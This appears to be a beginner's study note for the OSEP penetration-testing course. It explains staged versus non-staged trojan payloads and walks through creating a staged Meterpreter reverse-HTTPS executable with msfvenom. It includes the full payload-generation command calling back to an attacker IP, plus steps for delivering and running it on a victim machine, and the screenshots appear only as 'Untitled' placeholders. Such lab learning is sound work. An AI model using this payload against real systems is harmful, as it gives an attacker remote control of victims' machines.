Hello This Is The First Part In The OSEP

Let’s see we have two types of trojans

  1. Staged Payloads

  2. Non Staged Payloads

Staged Payloads

the staged payloads is a type of malware in which if it run in the victim operating system it connects back to the attacker to download the other stage you may mark it as the bridge between the victim machine and the malicious code we wish to run on the victim machine and this type of malware have low size and once the stages is delivered it maybe written on the hard disk or run directly from the memory

Untitled

as we see the /shell/ mean that this is a staged payload that contain a min amount of code that performs a callback then download the rest of code and execute it in the target memory (may evade anti virus programs)

For Example

let’s create a staged payload and notice everything

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.2.5 LPORT=443 -f exe -o staged.exe

Untitled

as we see we created our staged payload with msfvenom so let’s transfer it to the victim machine

Untitled

as we notice the size of the malware is 7kb which is really small because it only contains the necessary code that will execute a callback function to download the rest of the payload so let’s setup the multi handler before running it

Untitled

now let’s run the malware

Untitled

okay now we should go and check the multi handler to see the shell